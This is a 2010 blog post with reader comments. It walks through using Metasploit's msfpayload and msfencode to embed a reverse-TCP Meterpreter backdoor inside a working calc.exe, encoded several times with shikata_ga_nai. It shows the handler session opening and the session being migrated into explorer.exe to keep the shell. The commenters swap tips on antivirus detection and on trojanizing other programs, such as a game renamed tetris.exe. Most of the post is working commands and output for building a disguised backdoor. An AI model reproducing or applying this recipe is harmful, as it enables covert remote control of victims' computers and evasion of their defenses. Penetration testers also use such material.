Wednesday, March 24, 2010

Msfencode a Msfpayload Into An Existing Executable

Very cool update to metasploit today:

http://www.metasploit.com/redmine/projects/framework/repository/revisions/8896

This update allows you to msfencode a msfpayload into an existing executable and the new executable still function like the original. So if you inject into calc.exe you get calc.exe and your backdoor.

let's see the new msfencode options:

~/trunk$ ./msfencode -h

Usage: ./msfencode


OPTIONS:


-a The architecture to encode as

-b The list of characters to avoid: '\x00\xff'

-c The number of times to encode the data

-e The encoder to use

-h Help banner

-i Encode the contents of the supplied file path

-k Keep template working; run payload in new thread (use with -x)

-l List available encoders

-m Specifies an additional module search path

-n Dump encoder information

-o The output file

-p The platform to encode for

-s The maximum size of the encoded data

-t The format to display the encoded buffer with (c, elf, exe, java, js_le, js_be, perl, raw, ruby, vba, vbs, loop-vbs, asp, war)

-x Specify an alternate win32 executable template


Let's make our new backdoored executable.

~/trunk$ ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.210.11 R | ./msfencode -t exe -x calc.exe -k -o calc_backdoor.exe -e x86/shikata_ga_nai -c 5
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 345 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 372 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 399 (iteration=4)

[*] x86/shikata_ga_nai succeeded with size 426 (iteration=5)


Get the backdoored exe on the other box and execute it. We have a functional calc.exe and our shell.


msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.210.11

LHOST => 192.168.210.11

msf exploit(handler) > exploit


[*] Started reverse handler on 192.168.210.11:4444

[*] Starting the payload handler...

[*] Sending stage (748032 bytes)

[*] Meterpreter session 3 opened (192.168.210.11:4444 -> 192.168.210.11:51695)



Keep in mind that you'll still need to migrate away from the backdoored executable process because if they close the exe you lose your shell.

meterpreter > getuid

Server username: WINXPSP3\user

meterpreter > run migrate explorer.exe

[*] Current server process: calc_backdoor.exe (3360)

[*] Migrating to explorer.exe...

[*] Migrating into process ID 1592

[*] New server process: Explorer.EXE (1592)

meterpreter > getuid

Server username: WINXPSP3\user

meterpreter > getpid

Current pid: 1592

meterpreter >

11 comments:

  1. NICE...you are my hero!

    ReplyDelete
  2. The detection rate goes up for the packed executables and not every exe is working, i've tried the same with notepad and it just crashes.

    ReplyDelete
  3. dinos,

    i'd go read the notes on the svn revision and the support ticket as well as the patch. there are a few caveats.

    ReplyDelete
  4. This has been killing me the past couple of days! I was trying the same thing and using notepad and nothing but crashes with Win7. Now it works like a charm! Thanks for the post! Helped a lot and saved a lot of frustration.

    ReplyDelete
  5. It works for me through the firewall and with anti-virus fired up..however..calc or notepad are not opening,,,what am I doing wrong???

    ReplyDelete
  6. Dude, nearly all the metasploit payloads are easily being spotted by many of the AV vendors... There is no point in embedding it into a legitimate executable. Metasploit should have obfuscation options for making its payloads more stealthy... This is what Metasploit only lacks..

    ReplyDelete
  7. i'm sure they are taking patches...

    ReplyDelete
  8. good stuff mate! keep it up

    ReplyDelete
  9. im having an issue with this. the error i get is this when i type this in:

    ./msfpayload windows/meterpreter/reverse_http LHOST=192.168.250.104 R | ./msfencode -t exe -x ~/game.exe -k -o ~/tetris.exe -e x86/shikata_ga_nai -c 2

    x86/shikata_ga_nai failed: Not enough room for new section header

    I have researched this as much as i can and i still cant figure this out. any ideas?

    ReplyDelete
  10. not sure, hit up the IRC channel or the mail list

    ReplyDelete